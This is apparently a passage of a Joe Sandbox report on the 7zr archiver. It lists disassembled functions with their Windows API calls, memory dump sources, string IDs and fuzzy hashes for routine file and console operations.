                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: memset$ExceptionThrowfree
                            • String ID: Split
                            • API String ID: 1404239998-1882502421
                            • Opcode ID: bd5f8815bfa6d9698af5465081e63cf11493419951396f14ef7f9608ef448214
                            • Instruction ID: ecc44621da30c5ec969e7f5a102e74598c896530bf678d760b8c1dfc40dc64dc
                            • Opcode Fuzzy Hash: bd5f8815bfa6d9698af5465081e63cf11493419951396f14ef7f9608ef448214
                            • Instruction Fuzzy Hash: 96423A30A00249DFDF25DBA5C998FADBBB1BF05308F1440ADE849A7251CB71AE85DF52
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA759F
                              • Part of subcall function 00CA764C: CloseHandle.KERNELBASE(00000000,?,00CA75AF,00000002,?,00000000,00000000), ref: 00CA7657
                            • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 00CA75E5
                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 00CA7626
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CreateFile$CloseH_prologHandle
                            • String ID:
                            • API String ID: 449569272-0
                            • Opcode ID: 38cde00478bd3ee6db1f1e4e4372ef7d72747767d86579d9919ac7b79e8fe125
                            • Instruction ID: 78a3cba1850c4bab7e137974dbdd3a4200aacf179d343bd2bb4c0c4d24b7165a
                            • Opcode Fuzzy Hash: 38cde00478bd3ee6db1f1e4e4372ef7d72747767d86579d9919ac7b79e8fe125
                            • Instruction Fuzzy Hash: 4D11847280020BEFCF119FA4DC409EEBB7AFF15358F108629F960561A1C7719E65EB50
                            APIs
                            • fputs.MSVCRT ref: 00CD8437
                            • fputs.MSVCRT ref: 00CD8401
                              • Part of subcall function 00CA1FB3: __EH_prolog.LIBCMT ref: 00CA1FB8
                            • __EH_prolog.LIBCMT ref: 00CD83C4
                              • Part of subcall function 00CA1FA0: fputc.MSVCRT ref: 00CA1FA7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputs$fputc
                            • String ID:
                            • API String ID: 678540050-0
                            • Opcode ID: ad90fcae5297c94d8b661b2de6b462ec361ad8a39231599c60f68dfe05a12c12
                            • Instruction ID: e7d7d90b58e17ff06d8f0917856a62feadc7b8939d26081576ff5ae1955ac36b
                            • Opcode Fuzzy Hash: ad90fcae5297c94d8b661b2de6b462ec361ad8a39231599c60f68dfe05a12c12
                            • Instruction Fuzzy Hash: A5118635B0411A5FCF09BBE5DC239AEBBA5DF41754F00002AF90192291DF655949AAE4
                            APIs
                            • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,00CA77DB,?,?,00000000,?,00CA7832,?), ref: 00CA7773
                            • GetLastError.KERNEL32(?,00CA77DB,?,?,00000000,?,00CA7832,?,?,?,?,00000000), ref: 00CA7780
                            • SetLastError.KERNEL32(00000000,?,?,00CA77DB,?,?,00000000,?,00CA7832,?,?,?,?,00000000), ref: 00CA7797
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$FilePointer
                            • String ID:
                            • API String ID: 1156039329-0
                            • Opcode ID: 0f320578e0322c3bc3a41f3a72cdee78dfdf8b307c379450e392e87bc7281fb6
                            • Instruction ID: 33ce244d5f4661f76c3faa11ef9fab8929b9989de7e21fb6da733eb9387a330d
                            • Opcode Fuzzy Hash: 0f320578e0322c3bc3a41f3a72cdee78dfdf8b307c379450e392e87bc7281fb6
                            • Instruction Fuzzy Hash: 8A11BF3560430AAFEF128F68CC45BAE37E5BF06368F148529F826D7291D7B09E10DB60
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA5A91
                            • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 00CA5AB7
                            • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00CA5AEC
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AttributesFile$H_prolog
                            • String ID:
                            • API String ID: 3790360811-0
                            • Opcode ID: b2aeafe490d1967b57f3a9a2bdeb9856df5738d552bdfe5d7d90da9d29dfdb81
                            • Instruction ID: 56f42b2355ab373fc982d5b6827c534e7a01124ff197b46882b93615101b54d0
                            • Opcode Fuzzy Hash: b2aeafe490d1967b57f3a9a2bdeb9856df5738d552bdfe5d7d90da9d29dfdb81
                            • Instruction Fuzzy Hash: 8701B532E00217ABCF15ABA5AC816BEB775EF42355F148426EC21A3251CB364D05E660
                            APIs
                            • EnterCriticalSection.KERNEL32(00D62938), ref: 00CD588B
                            • LeaveCriticalSection.KERNEL32(00D62938), ref: 00CD58BC
                              • Part of subcall function 00CDC911: GetTickCount.KERNEL32 ref: 00CDC926
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CriticalSection$CountEnterLeaveTick
                            • String ID: v
                            • API String ID: 1056156058-3261393531
                            • Opcode ID: eb705e5016e8fa8f03115c6a09c9373f0f7ff3ee25367c9aa9b86daf54e1e5b8
                            • Instruction ID: 194db950684f235a24113a4c69ba97fe840974dfc0d333c85cda36d82bc37710
                            • Opcode Fuzzy Hash: eb705e5016e8fa8f03115c6a09c9373f0f7ff3ee25367c9aa9b86daf54e1e5b8
                            • Instruction Fuzzy Hash: 2DE0E579616210DFC308DF19E948E9A77A5AFE9311F05056FF505C7362CB309949CAB1
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB5BEF
                              • Part of subcall function 00CB54C0: __EH_prolog.LIBCMT ref: 00CB54C5
                              • Part of subcall function 00CB5630: __EH_prolog.LIBCMT ref: 00CB5635
                              • Part of subcall function 00CC36EA: __EH_prolog.LIBCMT ref: 00CC36EF
                              • Part of subcall function 00CB57C1: __EH_prolog.LIBCMT ref: 00CB57C6
                              • Part of subcall function 00CB58BE: __EH_prolog.LIBCMT ref: 00CB58C3
                            Strings
                            • Cannot seek to begin of file, xrefs: 00CB610F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: Cannot seek to begin of file
                            • API String ID: 3519838083-2298593816
                            • Opcode ID: 494ffcc3184f3bf61bd27b0cea43997dc833c8acfa6240c1c1435595e875fff8
                            • Instruction ID: f2a77a318bb1e5f80795fe24dffca02e115e3708595a2907e6139fde0ab54647
                            • Opcode Fuzzy Hash: 494ffcc3184f3bf61bd27b0cea43997dc833c8acfa6240c1c1435595e875fff8
                            • Instruction Fuzzy Hash: B012133090478A9FDF26DFB8C884BEEBBF5AF05304F14401DE45667292CB74AA85CB61
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE4E8F
                              • Part of subcall function 00CA965D: VariantClear.OLEAUT32(?), ref: 00CA967F
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ClearH_prologVariantfree
                            • String ID: file
                            • API String ID: 904627215-2359244304
                            • Opcode ID: 842c84354fe77012912a5e525b041f699e3fba272b3d73c5f9f88cf656a99143
                            • Instruction ID: 8602b33db15efcc7d0344e5f551c9935e6cd4f409702d9e5cc1b61c330c585b5
                            • Opcode Fuzzy Hash: 842c84354fe77012912a5e525b041f699e3fba272b3d73c5f9f88cf656a99143
                            • Instruction Fuzzy Hash: 4812B434900249DFCF11EFE6C985ADDBBB6BF45348F244068F815AB2A2DB329E45DB50
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC2CE0
                              • Part of subcall function 00CA5E10: __EH_prolog.LIBCMT ref: 00CA5E15
                              • Part of subcall function 00CB41EC: _CxxThrowException.MSVCRT(?,00D54A58), ref: 00CB421A
                              • Part of subcall function 00CA965D: VariantClear.OLEAUT32(?), ref: 00CA967F
                            Strings
                            • Cannot create output directory, xrefs: 00CC3070
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ClearExceptionThrowVariant
                            • String ID: Cannot create output directory
                            • API String ID: 814188403-1181934277
                            • Opcode ID: 9110e283f7498ac6d4936b37a3481dea0eac938339266195e65cc4ed3a68ae8a
                            • Instruction ID: 04a67ff2b8353dacd524e842af8cf9e8e7b74964a3bf7d7441fb0a11fbb92e1e
                            • Opcode Fuzzy Hash: 9110e283f7498ac6d4936b37a3481dea0eac938339266195e65cc4ed3a68ae8a
                            • Instruction Fuzzy Hash: 44F19D309002999FCF25EFA4C890EEEBBB5BF19304F1440ADE495A7252DB31AF49DB51
                            APIs
                            • fputs.MSVCRT ref: 00CDC840
                              • Part of subcall function 00CA25CB: _CxxThrowException.MSVCRT(?,00D54A58), ref: 00CA25ED
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowfputs
                            • String ID:
                            • API String ID: 1334390793-399585960
                            • Opcode ID: e57fd976cccd200238e3d68a293eef1f0a597933797d5c67080004a9acce551e
                            • Instruction ID: 423db421ed466b0c9c9a88fb7004371ec59d8e956ea11bb725c0be7b2d95f020
                            • Opcode Fuzzy Hash: e57fd976cccd200238e3d68a293eef1f0a597933797d5c67080004a9acce551e
                            • Instruction Fuzzy Hash: 9811EF716047419FDB25CF58C8C1BAAFBE6EF4A304F04446EE2868B281C7B1B904DB60
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: Open
                            • API String ID: 1795875747-71445658
                            • Opcode ID: d65cfbfecdafb2414f18459c94e0f83473930aaa70bb71278ddcec334d350558
                            • Instruction ID: 385203e53d473a4d294c4bdf6f2cef4b97af0bc83631ab490363c21fe23f6e20
                            • Opcode Fuzzy Hash: d65cfbfecdafb2414f18459c94e0f83473930aaa70bb71278ddcec334d350558
                            • Instruction Fuzzy Hash: 87119E361017049FC720EF78DD91ADABBE1EF15310F40892FE69A83212DA71A904CF60
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB58C3
                              • Part of subcall function 00CA6C72: __EH_prolog.LIBCMT ref: 00CA6C77
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            • Opcode ID: e7cf909a4ed3ae7b4420b2c1c747406a37ef1e5ecc155729391b116c129dcae9
                            • Instruction ID: 9f61950406b3f0c6a0cb20fb881b1a6b2964070e987024876c4d65e162b5475b
                            • Opcode Fuzzy Hash: e7cf909a4ed3ae7b4420b2c1c747406a37ef1e5ecc155729391b116c129dcae9
                            • Instruction Fuzzy Hash: D091F335900A0ADFCF25EFA4C881BFEBBB2EF45344F144068E952A7252DB315E45EB61
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CF06B3
                            • _CxxThrowException.MSVCRT(?,00D5D480), ref: 00CF08F2
                              • Part of subcall function 00CA1E0C: malloc.MSVCRT ref: 00CA1E1F
                              • Part of subcall function 00CA1E0C: _CxxThrowException.MSVCRT(?,00D54B28), ref: 00CA1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrow$H_prologmalloc
                            • String ID:
                            • API String ID: 3044594480-0
                            • Opcode ID: 19b63c15891c781c88377a357818b584c6dbbfad353fa4632adaa160e28b9a76
                            • Instruction ID: 5aae132fbe33f0cbf914108442a668af049e40b2810b4722831e34ccadc660cb
                            • Opcode Fuzzy Hash: 19b63c15891c781c88377a357818b584c6dbbfad353fa4632adaa160e28b9a76
                            • Instruction Fuzzy Hash: E4916C74D00249DFCF21DFA9C881AEEBBB5BF09344F244099E955A7292C730AE45DFA1
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: a2dff2584aca695afce4d3ff7aa97e0eb1f79b5a9d411e836e8800aaf0305c80
                            • Instruction ID: 593faea09ac89d7ab80981be0b59737ea8279d53952ba7d4cf06cfcb24adf97d
                            • Opcode Fuzzy Hash: a2dff2584aca695afce4d3ff7aa97e0eb1f79b5a9d411e836e8800aaf0305c80
                            • Instruction Fuzzy Hash: 9C518171508B40DFDB25DF74C490AEABBF5BF85304F188A5DE8E64B212D730AA84DB51
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC7B4D
                            • memcpy.MSVCRT(00000000,00D627DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 00CC7C65
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologmemcpy
                            • String ID:
                            • API String ID: 2991061955-0
                            • Opcode ID: 494610fb5430282b4b063d152875f64ddbf14b8d5c570e745002f272c5c60125
                            • Instruction ID: e9068a2bce5b7c59d2af76bd2662a887e9e1eb0493000f8912d47df3b044dfed
                            • Opcode Fuzzy Hash: 494610fb5430282b4b063d152875f64ddbf14b8d5c570e745002f272c5c60125
                            • Instruction Fuzzy Hash: 8D4165709042199BCB20EFA4C992FEEB7F4FF04304F10452DE856A3292DB31AE09DB60
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CF1516
                              • Part of subcall function 00CF10D3: __EH_prolog.LIBCMT ref: 00CF10D8
                            • _CxxThrowException.MSVCRT(?,00D5D480), ref: 00CF1561
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID:
                            • API String ID: 2366012087-0
                            • Opcode ID: c362d4f3a3410bb6fb085f26933173a5f1ec38bffec739a32abc980be469912b
                            • Instruction ID: 12485cbac7ad40f500a6778e010e0c99b5a24aac1a1ea57cb73faf2649185820
                            • Opcode Fuzzy Hash: c362d4f3a3410bb6fb085f26933173a5f1ec38bffec739a32abc980be469912b
                            • Instruction Fuzzy Hash: 8001F272900248EFDF118F94C815BEEBFB8EF81360F08405AF9455A211C3B5E955D7B1
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD5800
                            • fputs.MSVCRT ref: 00CD5830
                              • Part of subcall function 00CA1FA0: fputc.MSVCRT ref: 00CA1FA7
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputcfputsfree
                            • String ID:
                            • API String ID: 195749403-0
                            • Opcode ID: a1cd674a3978b979f4f15600f58ac3631db7206e5208ee9acae6743570c80b75
                            • Instruction ID: b486da9c170fcdf95b85c11efa7fe47fd28808307343a7307fc0c609671cf7ff
                            • Opcode Fuzzy Hash: a1cd674a3978b979f4f15600f58ac3631db7206e5208ee9acae6743570c80b75
                            • Instruction Fuzzy Hash: F6F05E32901519DFCB15BF94E8067DEBBB1EF05354F00442AF501A26A1CB745955DB94
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$fputc
                            • String ID:
                            • API String ID: 1185151155-0
                            • Opcode ID: 4cb2f758a86866f949e777bac042daea573c6fe06e740d701e148269683d48a9
                            • Instruction ID: f579dd8cae151462bf00585e822312eb5541003f7b0015a69e90886cea7e23e7
                            • Opcode Fuzzy Hash: 4cb2f758a86866f949e777bac042daea573c6fe06e740d701e148269683d48a9
                            • Instruction Fuzzy Hash: 1DE0123B60A314AF97162B58BC018553BD5DBCA76232A002FFB40D3360BF537D156AB4
                            APIs
                            • SysAllocStringLen.OLEAUT32(?,?), ref: 00CA952C
                            • _CxxThrowException.MSVCRT(?,00D555B8), ref: 00CA954A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AllocExceptionStringThrow
                            • String ID:
                            • API String ID: 3773818493-0
                            • Opcode ID: 1681c67d82f620632fc1adeca7b91386d6ac215818bc6d7e07b369b5c7ba2aee
                            • Instruction ID: 556764a295b70afe54c37ef6fe50589b3331ff3b9ee0823dd45eae357271af56
                            • Opcode Fuzzy Hash: 1681c67d82f620632fc1adeca7b91386d6ac215818bc6d7e07b369b5c7ba2aee
                            • Instruction Fuzzy Hash: 70F065716103059FC710DF94D846D8677ECEF05344740842AF945CB310E770E80487A0
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast_beginthreadex
                            • String ID:
                            • API String ID: 4034172046-0
                            • Opcode ID: 53119957339ee447ad328db3177bb892e590d7d4e3e9ee3e0aaade2433b7f3b4
                            • Instruction ID: 4ee8f2ad5e7386b1f7955b21d6ce26da1e1c524fa572556eab395745793d1030
                            • Opcode Fuzzy Hash: 53119957339ee447ad328db3177bb892e590d7d4e3e9ee3e0aaade2433b7f3b4
                            • Instruction Fuzzy Hash: 15E0C2F62093026BF3209B60CC02F77729CEBA0B80F44847DFA45D6180E660CD00C7B1
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,00CA9C6E), ref: 00CA9C52
                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CA9C59
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
